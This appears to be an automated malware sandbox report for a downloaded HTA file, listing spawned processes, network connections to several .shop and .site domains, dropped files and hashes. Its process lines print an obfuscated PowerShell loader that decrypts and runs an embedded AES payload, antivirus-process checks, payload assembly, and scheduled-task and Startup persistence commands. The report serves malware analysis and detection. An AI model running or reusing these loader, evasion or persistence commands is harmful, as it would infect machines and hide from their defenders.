C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\CONT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KdzuM($NJCgwo){return -split ($NJCgwo -replace '..', '0x$& ')};$nJRvzQn = KdzuM('59D4B57EFCB115FC66D7A806033211ADF9C76CB2046E20E58388D524E217ADBE720ACF13566AA7197EF9F70B52522CD93DFE66F26FA28816123FDC13355DE6BFED560DE32406FFAAED7A398B73C4763B86CCDD6A1A74B1813103EC5AA63A2E6EC3249655AF3DE97D0910908CAA825E17599594D262B4A64039D35F2ECE79968B4D8FAD504C59A6F6CB0A686B6BE23EAD32224675B3B0C40EB40001758F98E539659835639CCB42E0E7BF653E1F8C8F8020D573B84D9AB22D796A73712E4635298802BB049E8418807ED44CE3AE010FEB658E09EA564AE63231D950DDB50F20CB0A3295E9B45117688625FA2771BC9003AF185B321A8323F5EBDAFD517772BCB919B7C9A65209AE20AA1A9D6600617E75DE7B985392781704483491510D7A02E08FBECB86D286C60A6002E05FFD722E588EDE1DE2B37929FAE41E15D00B9A735AFFE3192F60BA58941BC0102AA6A4F0801480C8530DA1338E74A4A55FE0230424F3977BAD4C8828C61758BB76E826DF9813B9F2FA5C785BD003E8B73DB84048078167F6ADF6B13B76DD54E4454BAD1958C7087C9A9093DE83491D2F4DD774EDA0312D6386AF741590562FA26906240FE229773A6B798A3FA7C0DCE6779A7C6D4025E833DB67DBE20725CF60AF5DC170974CFD9E802C5CC8286A3672F5CDFE99622C83CA2CB622C91C0578515198F3525D2FD652A40408B9DBD71071F8AB0E73C0596C5FBE9F44A7CCA476F819D27A41E689DF14B08F243A5E50D978DEA6A1CD19B37B09AEF96AD8037119525524B259C73B3B74DD7A7B338ECCAEACF31C56AA13B8C812274EBCDE67CA90891DE23E8A27E01F55519FF128341EF2FA293C1990A43CA93852946435EF55143F4DFD67993513F589BFE597872E8ACEFC08BD2F56BF76FCE883899568DC16E39103908FB62048FAAC4AD6FE4C69F00F5C681E427678BEB563C1D5B2D3961B98188249782D4BF17E372975F5F1B158678CE45B24BCAE3546ABF30EEFF2B40C70FAD85E4608A81EBB97657FE0C0CEC592357253AEF1A4C6CEABECD495AF59F8D2C0AE1D759C6DB59AEEA0B233DCE4EEC704644465081DA9A00FF4536F4AFD1388B4BDF8649537F2AFB3357A59CA284AE88106A779F0C95F4D7B74FAFF0E60337FCF8076D3DBC4806A2EC7BF3FD210C4EFFF171E8FFEBA6330E1B008668F259FEDD9CD7757BA614E2A1F4DD4FBB235C78378969610A70DA187B06304941E6D43106ED9E1A342F84EA6D9C56B7CBEEEF5BCDF82872873B12A07387939CFFE7D495AE7592DE22CEEDFA70974DF774954A844375FB940299789F748FDCE7ECE065AB6838DF840AD24ABC46B027A1FF958A14633E8CADAE7BC065FB3C1084F3E064B54012009B86E35AE12ACF8F66E87300E0353BC5039AB303F269A1CDB1EE66F159DEBF01BB18E3A0DA0F3B125B6C6B542DA6A9DB9B77073EA54CE25870DBDF525DE6FC413AF5D3FED1B14A31E7131DADD4D7FEBD66E1169B3918465AEDFA53312EB41BFF7DE8C7650BCAFA7A610121ED67AF58D99589CC4ABFC60C4F487EFFC91C6C28EB9227893BD999607E8AF5D7AA2C38DC23931377B5DA470FD490A37B50CFEE0084AC966DCEBD5E8B4EC479B6E8C3457BBC63280AE784C01A8A1878D60AE4986DE257BAE24B00C84DF217DEB58DC28B4C01AB5DC62');$IrXNN = [System.Security.Cryptography.Aes]::Create();$IrXNN.Key = KdzuM('5946774947416C527A6278784E4F764C');$IrXNN.IV = New-Object byte[] 16;$eNsiDaGZ = $IrXNN.CreateDecryptor();$qxBtKieQN = $eNsiDaGZ.TransformFinalBlock($nJRvzQn, 0, $nJRvzQn.Length);$OXqabSFMc = [System.Text.Encoding]::Utf8.GetString($qxBtKieQN);$eNsiDaGZ.Dispose();& $OXqabSFMc.Substring(0,3) $OXqabSFMc.Substring(3)

C:\ProgramData\1ASPX.exe

"C:\ProgramData\1ASPX.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,12913230348321713725,10290518487935385186,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5332 /prefetch:2

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\CONT.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KdzuM($NJCgwo){return -split ($NJCgwo -replace '..', '0x$& ')};$nJRvzQn = KdzuM('59D4B57EFCB115FC66D7A806033211ADF9C76CB2046E20E58388D524E217ADBE720ACF13566AA7197EF9F70B52522CD93DFE66F26FA28816123FDC13355DE6BFED560DE32406FFAAED7A398B73C4763B86CCDD6A1A74B1813103EC5AA63A2E6EC3249655AF3DE97D0910908CAA825E17599594D262B4A64039D35F2ECE79968B4D8FAD504C59A6F6CB0A686B6BE23EAD32224675B3B0C40EB40001758F98E539659835639CCB42E0E7BF653E1F8C8F8020D573B84D9AB22D796A73712E4635298802BB049E8418807ED44CE3AE010FEB658E09EA564AE63231D950DDB50F20CB0A3295E9B45117688625FA2771BC9003AF185B321A8323F5EBDAFD517772BCB919B7C9A65209AE20AA1A9D6600617E75DE7B985392781704483491510D7A02E08FBECB86D286C60A6002E05FFD722E588EDE1DE2B37929FAE41E15D00B9A735AFFE3192F60BA58941BC0102AA6A4F0801480C8530DA1338E74A4A55FE0230424F3977BAD4C8828C61758BB76E826DF9813B9F2FA5C785BD003E8B73DB84048078167F6ADF6B13B76DD54E4454BAD1958C7087C9A9093DE83491D2F4DD774EDA0312D6386AF741590562FA26906240FE229773A6B798A3FA7C0DCE6779A7C6D4025E833DB67DBE20725CF60AF5DC170974CFD9E802C5CC8286A3672F5CDFE99622C83CA2CB622C91C0578515198F3525D2FD652A40408B9DBD71071F8AB0E73C0596C5FBE9F44A7CCA476F819D27A41E689DF14B08F243A5E50D978DEA6A1CD19B37B09AEF96AD8037119525524B259C73B3B74DD7A7B338ECCAEACF31C56AA13B8C812274EBCDE67CA90891DE23E8A27E01F55519FF128341EF2FA293C1990A43CA93852946435EF55143F4DFD67993513F589BFE597872E8ACEFC08BD2F56BF76FCE883899568DC16E39103908FB62048FAAC4AD6FE4C69F00F5C681E427678BEB563C1D5B2D3961B98188249782D4BF17E372975F5F1B158678CE45B24BCAE3546ABF30EEFF2B40C70FAD85E4608A81EBB97657FE0C0CEC592357253AEF1A4C6CEABECD495AF59F8D2C0AE1D759C6DB59AEEA0B233DCE4EEC704644465081DA9A00FF4536F4AFD1388B4BDF8649537F2AFB3357A59CA284AE88106A779F0C95F4D7B74FAFF0E60337FCF8076D3DBC4806A2EC7BF3FD210C4EFFF171E8FFEBA6330E1B008668F259FEDD9CD7757BA614E2A1F4DD4FBB235C78378969610A70DA187B06304941E6D43106ED9E1A342F84EA6D9C56B7CBEEEF5BCDF82872873B12A07387939CFFE7D495AE7592DE22CEEDFA70974DF774954A844375FB940299789F748FDCE7ECE065AB6838DF840AD24ABC46B027A1FF958A14633E8CADAE7BC065FB3C1084F3E064B54012009B86E35AE12ACF8F66E87300E0353BC5039AB303F269A1CDB1EE66F159DEBF01BB18E3A0DA0F3B125B6C6B542DA6A9DB9B77073EA54CE25870DBDF525DE6FC413AF5D3FED1B14A31E7131DADD4D7FEBD66E1169B3918465AEDFA53312EB41BFF7DE8C7650BCAFA7A610121ED67AF58D99589CC4ABFC60C4F487EFFC91C6C28EB9227893BD999607E8AF5D7AA2C38DC23931377B5DA470FD490A37B50CFEE0084AC966DCEBD5E8B4EC479B6E8C3457BBC63280AE784C01A8A1878D60AE4986DE257BAE24B00C84DF217DEB58DC28B4C01AB5DC62');$IrXNN = [System.Security.Cryptography.Aes]::Create();$IrXNN.Key = KdzuM('5946774947416C527A6278784E4F764C');$IrXNN.IV = New-Object byte[] 16;$eNsiDaGZ = $IrXNN.CreateDecryptor();$qxBtKieQN = $eNsiDaGZ.TransformFinalBlock($nJRvzQn, 0, $nJRvzQn.Length);$OXqabSFMc = [System.Text.Encoding]::Utf8.GetString($qxBtKieQN);$eNsiDaGZ.Dispose();& $OXqabSFMc.Substring(0,3) $OXqabSFMc.Substring(3)

C:\ProgramData\1ASPX.exe

"C:\ProgramData\1ASPX.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Windows\SysWOW64\SearchIndexer.exe

C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe

"C:\Users\Admin\AppData\Local\Temp\SFTJHYUHO4CL1MMZJUD0ZK54K0.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Pushing Pushing.cmd & Pushing.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 64684

C:\Windows\SysWOW64\findstr.exe

findstr /V "houseslegislationcivilianscientific" Corners

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Refresh + Host + Exists + Homeland + Wayne + Might 64684\x

C:\Users\Admin\AppData\Local\Temp\64684\Run.pif

64684\Run.pif 64684\x

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "Pt" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js'" /sc minute /mo 5 /F

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DolphinLogix.url" & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "Pt" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraSoft Dynamics\DolphinLogix.js'" /sc minute /mo 5 /F

C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe

"C:\Users\Admin\AppData\Local\Temp\DQETZ5NEYRS9996CDCA36DJS07.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Pushing Pushing.cmd & Pushing.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 64684

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Refresh + Host + Exists + Homeland + Wayne + Might 64684\x

C:\Users\Admin\AppData\Local\Temp\64684\Run.pif

64684\Run.pif 64684\x

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\CONT.hta

Network

Country Destination Domain Proto
US 8.8.8.8:53 instantinfo.shop udp
US 172.67.170.122:443 instantinfo.shop tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 122.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 instantinfo.shop udp
US 172.67.170.122:443 instantinfo.shop tcp
US 8.8.8.8:53 timetablepdodwp.shop udp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 8.8.8.8:53 125.66.21.104.in-addr.arpa udp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 8.8.8.8:53 webtime.site udp
US 172.67.222.142:443 webtime.site tcp
US 8.8.8.8:53 142.222.67.172.in-addr.arpa udp
US 8.8.8.8:53 ieMODxkhNMrCbJWxGjU.ieMODxkhNMrCbJWxGjU udp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 104.21.66.125:443 timetablepdodwp.shop tcp
US 172.67.222.142:443 webtime.site tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 06b496d28461d5c01fc81bc2be6a9978
SHA1 36e7a9d9c7a924d5bb448d68038c7fe5e6cbf5aa
SHA256 e4a2d1395627095b0fa55e977e527ccb5b71dff3cd2d138df498f50f9f5ab507
SHA512 6488a807c978d38d65010583c1e5582548ab8102ebd68ee827e603c9bdfcdbb9f98a488d31414a829409f6edca8bd2eb4aadd4ff31b144de41249fa63a26bc91

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 de1d175f3af722d1feb1c205f4e92d1e
SHA1 019cf8527a9b94bd0b35418bf7be8348be5a1c39
SHA256 1b99cae942ebf99c31795fa279d51b1a2379ca0af7b27bd3c58ea6c78a033924
SHA512 f0dcd08afd3c6a761cc1afa2846ec23fb5438d6127ebd535a754498debabd0b1ebd04858d1b98be92faf14b512f982b1f3dcbb702860e96877eb835f763f9734

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1487d5ab-d45d-4b96-af75-db60de9abe3e.tmp

MD5 50adf9a9563af7fe2e36859c0d45579f
SHA1 105e198e1fbfa7616efe14705c743b5a7f9f6b7f
SHA256 0f65270cc437d3cf7aa30553c4420a4196e27e598459efc6a63731b2118fe8cd
SHA512 dde3f0c7a6ace0a1c4992045265cb046292ea3dfa975e8c7e86ef9d5313c966b9894e447dcdc6cf7da7c2752934144681089bdc2d8933d8418f33d2afcdac715

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\CONT

MD5 0b8726a3eebe541ee1ccae02a2cc8811
SHA1 434810b4f6051eb8e0ef2ea034df63e8efa557cc
SHA256 3ac0ec1576eb739f7260eeb594d1a3301779291ab812379868d9acd696684d4d
SHA512 4a9c2dbeb92fab083e7f7ca2dacf55241166f5bfcfb8b84a852a9b2a268224a004aba08d8ecbcf9c77b0b60af2d2747084f3956a9807507076608ec6021bb1c7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 b1943ab587f3de5e518eaea7a59be248
SHA1 21d4fa394954a0aee8af676934bb8fd794a2babf
SHA256 1bad73c1f85d0de00da236c5ffcf03bbf121309704b4e5ecabd78d117127ab2d
SHA512 fbba80d83a35ecd06076190c13cb20e4ef69b5c5fd6d9a77badfa2c9952d53f499d2e728258522f3e48e9a1bfa4f10726759e52bde239ed940a62da0be735735

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 54ed67d21d655a71358ebc9f94e720c2
SHA1 f942c88ce78341d04980b19e9a1cb1a53ac48400
SHA256 0e62145c029619d04169642343b1cebb8e2a72d18de63928e8b37af1ff73f52e
SHA512 3eb4546e65fd0d63c2454ff61e0cd6348e6b5cec16a4f3698607ed10c510b1e415c062246c9bb7b5b41c3c3bbf559e07bc61ce0b25fde1416227347e08e09cd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 1b1eefb7f57e4ae86c683e50d58808c1
SHA1 9d143579d41c8ff60afb213a058a2ff0efa9ad78
SHA256 01ffd30b72c8d6e7cefa5de7804a78b7bb3044cced989b5539a4e538a5a0f23c
SHA512 7debf206849035360f34041933b3ffebc750ede25b38e21db684334a7209a8766481b9ff0db264e6b2c3a495aa79558af72e22adef96991fc0260b99216d9b8a

memory/3324-111-0x0000000005170000-0x00000000051A6000-memory.dmp

memory/3324-112-0x0000000005910000-0x0000000005F38000-memory.dmp

memory/3324-113-0x0000000005850000-0x0000000005872000-memory.dmp

memory/3324-114-0x0000000006030000-0x0000000006096000-memory.dmp

memory/3324-115-0x00000000060A0000-0x0000000006106000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4yubce1.a5l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3324-125-0x0000000006210000-0x0000000006564000-memory.dmp

memory/3324-126-0x00000000066F0000-0x000000000670E000-memory.dmp

memory/3324-127-0x0000000006740000-0x000000000678C000-memory.dmp

memory/3324-128-0x0000000008060000-0x00000000086DA000-memory.dmp

memory/3324-129-0x0000000006C20000-0x0000000006C3A000-memory.dmp

memory/3324-130-0x00000000079E0000-0x0000000007A76000-memory.dmp

memory/3324-131-0x00000000076F0000-0x0000000007712000-memory.dmp

memory/3324-132-0x00000000086E0000-0x0000000008C84000-memory.dmp

memory/3324-134-0x0000000007EF0000-0x0000000007F22000-memory.dmp

memory/3324-135-0x000000006D020000-0x000000006D06C000-memory.dmp

memory/3324-136-0x000000006D190000-0x000000006D4E4000-memory.dmp

memory/3324-146-0x0000000007ED0000-0x0000000007EEE000-memory.dmp

memory/3324-147-0x0000000007F30000-0x0000000007FD3000-memory.dmp

memory/3324-148-0x0000000008020000-0x000000000802A000-memory.dmp

memory/3324-149-0x0000000009C90000-0x0000000009CA1000-memory.dmp

memory/3324-150-0x0000000009CD0000-0x0000000009CE2000-memory.dmp

memory/3324-151-0x0000000009CC0000-0x0000000009CCA000-memory.dmp

C:\ProgramData\1ASPX.exe

MD5 850a43e323656b86ae665d8b4fd71369
SHA1 099d6e80c394ccc5233e1cbd6b29769da9e0e2aa
SHA256 539423d2e436e198df15b5577d816dc306ba4c03b1362f7731e675b51f4a5f42
SHA512 1f2778040e906ea2939a8b0a682e267599aa8422f81ea83bb6c980a304b569ad750ef3e81e1490edd5b1d74e734a2cb82f428f47096c55436037e03e516d2378

C:\ProgramData\flutter_custom_cursor_plugin.dll

MD5 09518cda3e0d986b81d434e04599bb45
SHA1 a434a37f575928b0f07c65588cafa28970d72234
SHA256 3c0a26c3ca4b75fb1309a4461dd51e190ec6f325f689f5f881d90fa13dfb3d30
SHA512 dbebd11bbeb4f2b6fbfddc7c519805675b3babb6b5a7c1c65e6c5ddac4be18f1599359b712b706059c27e9144183fba0b2418ee672450a8ee5207b65b547369b

C:\ProgramData\desktop_multi_window_plugin.dll

MD5 42c063882fd7cedd3cc62356450d8987
SHA1 a09db77f70a6f7d7c59418fc08250a8e13e8a60d
SHA256 37d1ebfc8f423bf02dec598c6421e4124c8c5666c27782180d84003039e88dff
SHA512 77ac9c670f91059b2caa12da9b5417cd71d525f900b7dda51ffcf499aa2882734b342f6803814c6fde1b527c9742ed9cf67ab1ee8d141cb437b57c979d89b456

C:\ProgramData\flutter_windows.dll

MD5 e3e8d995e4a1d5e84ee11dbd58d21f3b
SHA1 52e7afb03dd3f45f7b8839879fec1acc7965a62e
SHA256 29782ac1f424865fa1007a5f818f35abb5307b01c099aaa38067513e516a0454
SHA512 f4fb26d4dc2d91d36fd8f26b9be6b74f50df94de530afdd8d2d5e9d6d6300b52fb9c6efbd94a95d630094ce59d5d1aa1b898f810be8806b7e9dfc5466d312659

C:\ProgramData\window_size_plugin.dll

MD5 7024d49df9315b5718f40fcd29a8656f
SHA1 ef243d1ec09f2fb714459d596f40a87b5b51c054
SHA256 51877e41297ae94fe33d01d980717ae18938a3e81a32c57adc77d754ef7e66be
SHA512 d9b7661b923b45020641f80a4695079a86f92848a022c8374c9339258a3f63d628000628cf75163b7c707a8506bb4d4928a1ea75e09fa6416eb9a2150eb5b705

C:\ProgramData\window_manager_plugin.dll

MD5 eab165f7a1856fc4fc191416a26f20f3
SHA1 3e3baaa9a8ae20680d4b347a3a65e4a388dc0f4d
SHA256 a2c87dfe4d43c7cc8ac44f2ac43bd45ec4f3f6ba87a2c73ae8b55f26286600e9
SHA512 897e0f107beb1fcc6402183c535f2550e954b379451415e8b40403d0575efa6e1d1373f9f0b9a0649ab09515259490c7bfb9e9926f76735ee513f68460fb5143

C:\ProgramData\aeolotropy.yaml

MD5 17c7c2c9b51a08322c5c94a50e92d81f
SHA1 c6c94230ea0f3d2aa374491856c11d46e8bea555
SHA256 597356a0d11076bb8560d5703e3bc47dcb490ee90b87573c04a3183e5f19f775
SHA512 51e376a573826d35637e8f358beacd2ac28c9443ad586a4e139e172f84539bf26a10934669ba2b1da57793fe6cc70428da85044cfc465583deada2c059a44726

memory/1936-222-0x00007FFA500A0000-0x00007FFA50512000-memory.dmp

C:\ProgramData\importunacy.tiff

MD5 ccd8a59b737b7968e8d4c1ecac083c42
SHA1 af4ca1a6d96bbc087a183898ba1db63bd14a1069
SHA256 09697ae7191dd5d1f431cec653995242330da6655f96bab6e446ebfb8f3d6eb4
SHA512 7aa7c585b9583c90a9518700cd7177fc6644a4f40c7ef360a3d828b0e936892b7fe54f5a4485017994fccb9ea6b869e4d77699df24955af433045fdccf5cfc1e

C:\ProgramData\uni_links_desktop_plugin.dll

MD5 94267176e212b8ebff06728cc6c3f432
SHA1 f65313083c2b3177f405b7ab884ba0a9be3251d9
SHA256 08d08cbfa4d5531ceee16bfcb2255eda79c5b7f7c0894c4e6f49f673457ab362
SHA512 014459c9d3dbe7c09e0d6db085ce9f715248ba6d784845339b2d6896a8ba7b680c93e707d4990350e30c8853a95fd0dc6f8e9244643787db65ab8a2f95c26967

C:\ProgramData\url_launcher_windows_plugin.dll

MD5 bfec2012b6589d4496ea0283e90a5269
SHA1 813e3fad5cfe4a30e20f05080d106811c5544fa3
SHA256 f9406ecaa9c86f2946f8b9d997f0210f1f5ee974be6548d1db039014d1b45552
